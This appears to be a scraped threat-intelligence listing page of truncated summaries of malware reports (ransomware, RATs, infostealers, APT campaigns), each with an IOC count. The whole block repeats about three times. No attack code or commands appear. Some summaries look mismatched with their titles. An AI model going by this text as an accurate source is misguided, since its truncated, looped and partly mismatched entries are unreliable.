The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
The China-based threat group Water Sigbin, known for deploying cryptocurrency-mining malware, exhibited new techniques to evade detection. It exploited CVE-2017-3506 and CVE-2023-21839 to deploy a PowerShell script executing a miner. The script utilized complex encoding, environment variables to hi…
Downloadable IOCs 9
Gootloader walkthrough
The analysis delves into the intricate workings of the Gootloader malware campaign. Through a meticulously crafted social engineering scheme involving SEO poisoning and fake forums, threat actors lure unsuspecting victims into downloading a malicious JavaScript file disguised as a legitimate resour…
Downloadable IOCs 12
Spring Exacerbation: UAC-0006 increased cyberattacks
This report aims to provide insights into the ongoing cyber operations targeting Ukraine. It analyzes the tactics, techniques, and procedures employed by threat actors in their malicious campaigns. The document offers a comprehensive overview of the cybersecurity landscape in Ukraine, highlighting …
Downloadable IOCs 31
Analysis and Detection of CLOUD#REVERSER: An Attack Involving Threat Actors Compromising Systems Using A Sophisticated Cloud-Based Malware
Securonix Threat Research has uncovered a sophisticated malware campaign, dubbed CLOUD#REVERSER, that leverages popular cloud storage services like Google Drive and Dropbox for malware delivery, command execution, and data exfiltration. The infection chain starts with a phishing email containing a …
Downloadable IOCs 16
Exploring the Metamorfo Banking Trojan
This report delves into a malware campaign known as Metamorfo, a banking Trojan that spreads through malspam campaigns. It entices users to click on HTML attachments, initiating a series of activities focused on gathering system metadata. The infection chain involves obfuscation techniques, URL eva…
Downloadable IOCs 39
Mallox ranomware affiliate leverages PureCrypter in MS-SQL exploitation campaigns
A team from security firm Sekoia has observed a series of attacks targeting vulnerable assets, including MS-SQL, and Mallox ransomware, using techniques similar to that of the PureCrypter ransomware.
Downloadable IOCs 10
Phishing Campaigns Targeting USPS See as Much Web Traffic as the USPS Itself
Following the 2023 holiday season, Akamai researchers uncovered a significant amount of highly likely malicious activity and domains purporting to be associated with the United States Postal Service (USPS). Akamai researchers compared five months of DNS traffic to the legitimate domain, usps.com, w…
Downloadable IOCs 34
From IcedID to Dagon Locker Ransomware in 29 Days
This intrusion started in August 2023 with a phishing campaign that distributed IcedID malware. The phishing operation utilized the Prometheus Traffic Direction System (TDS) to deliver the malware and victims were directed to a fraudulent website, mimicking an Azure download portal.
Downloadable IOCs 33
Unmasking Lumma Stealer: Analyzing Deceptive Tactics with Fake CAPTCHA
Lumma Stealer, a sophisticated information-stealing malware, has evolved its tactics to employ fake CAPTCHA verification for payload delivery. The malware exploits legitimate software and uses multi-stage fileless techniques to evade detection. Its infection chain involves PowerShell scripts, proce…
Downloadable IOCs 23
Beware: Fake Google Meet Pages Deliver Infostealers in Ongoing ClickFix Campaign
Threat actors are using fake Google Meet web pages as part of the ClickFix campaign to deliver infostealers targeting Windows and macOS systems. The attackers display fake error messages in web browsers, tricking users into executing malicious PowerShell code. The campaign has expanded to impersona…
Downloadable IOCs 0
Burning Zero Days: Suspected Nation-State Adversary Targets Ivanti CSA
A zero-day vulnerability exploited by an advanced adversary to gain access to a victim’s network, according to research by FortiGuard Labs and the Centre for Strategic Intelligence (CISA).
Downloadable IOCs 17
HijackLoader evolution: abusing genuine signing certificates
A report by HarfangLab EDR and MITRE ATT&CK on the threat posed by the Lumma Stealer malware, published on 11 October, 2024, outlines the tactics used to deploy the malware.
Downloadable IOCs 69
Malware by the (Bit)Bucket: Uncovering AsyncRAT
A sophisticated attack campaign using Bitbucket as a legitimate platform to deliver AsyncRAT has been uncovered. The multi-stage approach involves a VBScript obfuscation layer, followed by a PowerShell payload delivery mechanism, and culminates in the execution of AsyncRAT. The attackers exploit Bi…
Downloadable IOCs 0
Not All Fun and Games: Lua Malware Targets Educational Sector and Student Gaming Engines
Over the past year, the delivery of Lua malware appears to have undergone simplification, possibly to reduce exposure to detection mechanisms. The malware is frequently delivered using obfuscated Lua scripts instead of compiled Lua bytecode, as the latter can trigger suspicion more easily.
Downloadable IOCs 18
Tweaking AsyncRAT: Using Python and TryCloudflare to Deploy Malware
A new AsyncRAT malware campaign utilizes TryCloudflare quick tunnels and Python packages to deliver malicious payloads. The attack chain involves HTML attachments with 'search-ms' URI protocol handlers, leading to LNK files that download BAT files. These BAT files then retrieve and execute Python s…
Downloadable IOCs 15
PowerShell Keylogger
A newly identified keylogger operating via PowerShell script has been analyzed, revealing its capabilities to capture keystrokes, gather system information, and exfiltrate data. The malware uses a cloud server in Finland as a proxy and an Onion server for C2 communication, ensuring anonymity. It im…
Downloadable IOCs 3
Exploring AsyncRAT and Infostealer Plugin Delivery Through…
This analysis details an AsyncRAT infection observed in August 2024, delivered via email. The attack chain involves a Windows Script File that downloads and executes various scripts, ultimately leading to the installation of AsyncRAT with an infostealer plugin. The malware targets multiple browsers…
Downloadable IOCs 8
Analyzing the Mekotio Trojan
The analysis delves into the Mekotio Trojan, a sophisticated malware that employs a PowerShell dropper to execute its payload. The dropper employs obfuscation techniques, such as custom XOR decryption, to conceal its operations. It collects system information, communicates with a command-and-contro…
Downloadable IOCs 2
Decoding the Stealthy Memory-Only Malware
This intelligence report provides an in-depth analysis of a complex, multi-stage malware campaign called PEAKLIGHT. It details the infection chain, starting with movie lure ZIP files containing malicious LNK files that initiate a JavaScript dropper. This dropper then executes a PowerShell downloade…
Downloadable IOCs 23
Report on Ukraine government attack campaign
Ukraine's government cybersecurity incident response team, CERT-UA, obtained information about the distribution of emails themed around prisoners of war, containing links to download an archive named 'spysok_kursk.zip'. This archive contained a CHM file with JavaScript code that launched an obfusca…
Downloadable IOCs 33
Multiple Malware Dropped Through MSI Package
An analysis reveals the distribution of malware through an MSI package, specifically SectopRat and Redline stealer. The malware employs techniques like executing malicious scripts, disabling security measures, and establishing persistence through scheduled tasks. It communicates with command-and-co…
Downloadable IOCs 11
Unmasking Cronus: How Fake PayPal Documents Execute Fileless Ransomware via PowerShell
The analysis reveals a sophisticated campaign employing fake PayPal receipts as lures to distribute a new variant of the Cronus ransomware. The infection chain begins with a malicious Word document containing an obfuscated VBA macro that downloads a PowerShell loader from a remote server. This load…
Downloadable IOCs 8
Detecting evolving threats: NetSupport RAT campaign
This analysis examines a recent malware campaign that utilizes the NetSupport RAT, a legitimate remote administration tool, for persistent infections. The threat actors behind this campaign employ obfuscation techniques and updates to evade detection. However, by identifying weaknesses in the obfus…
Downloadable IOCs 3
Distribution of AsyncRAT Disguised as Ebook
This analysis covers the distribution of AsyncRAT malware disguised as an ebook. The compressed file contains a malicious LNK and PowerShell scripts that ultimately execute AsyncRAT. The malware employs various techniques, such as obfuscation, task scheduling, and anti-VM and anti-AV capabilities, …
Downloadable IOCs 5
Kimsuky Group’s New Backdoor (HappyDoor)
This report provides a detailed analysis of the HappyDoor malware, a new backdoor utilized by the Kimsuky threat group known for targeting organizations with spear-phishing attacks. The malware employs sophisticated techniques like self-duplication, hidden execution paths, and encrypted communicati…
Downloadable IOCs 7
Turla: A Master of Deception
This report details a recent campaign by the Turla threat group involving malicious LNK files that deliver a fileless backdoor. The attack leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs various evasion techniques like disabling security features…
Downloadable IOCs 10
ProxyLogon and ProxyShell Used to Target Government Mail Servers in Asia, Europe, and South America
This analysis describes the identification of a server likely exploiting ProxyLogon and ProxyShell vulnerabilities to gain unauthorized access to government email servers across Asia, Europe, and South America. The threat actor leveraged open-source exploit code to infiltrate systems and steal sens…
Downloadable IOCs 4
Malvertising Campaign Leads to Execution of Oyster Backdoor
Rapid7 has observed a recent malvertising campaign that lures users into downloading malicious installers for popular software such as Google Chrome and Microsoft Teams.
Downloadable IOCs 13
AdsExhaust, a Newly Discovered Adware MasqueradingOculus…
In June 2024, the eSentire Threat Response Unit (TRU) identified adware, which we have dubbed AdsExhaust, being distributed through a fake Oculus installer application. The adware is capable of exfiltrating screenshots from infected devices and interacting with browsers using simulated keystrokes.
Downloadable IOCs 17
FHAPPI Campaign APT10 FreeHosting APT PowerSploit Poison Ivy
This analysis details a malicious campaign dubbed 'FHAPPI' by the researcher, which utilized compromised Geocities Japan accounts to host malware payloads. The campaign leveraged VBScript and PowerShell scripts to execute encoded commands, ultimately delivering the Poison Ivy remote access trojan (…
Downloadable IOCs 5
From Clipboard to Compromise: A PowerShell Self-Pwn
This intelligence report details a unique social engineering technique observed by Proofpoint researchers, leveraging users to copy and paste malicious PowerShell scripts to infect their computers. The threat actors TA571 and ClearFake activity cluster employ this method to deliver malware like Dar…
Downloadable IOCs 14
APT Attacks Using Cloud Storage
The report describes a malicious campaign where threat actors utilize cloud services like Google Drive, OneDrive, and Dropbox to distribute malware and collect user information. The attack process starts with a malicious shortcut file (LNK) that executes PowerShell scripts to download decoy documen…
Downloadable IOCs 1
Warning Against Phishing Emails Prompting Execution of Commands via Paste
This report details a phishing campaign distributing malicious HTML files through emails. The files prompt users to paste and run malicious PowerShell commands that initiate a multi-stage infection process. The campaign ultimately delivers the DarkGate malware, highlighting the importance of exerci…
Downloadable IOCs 15
Decoding Water Sigbin's Latest Obfuscation Tricks
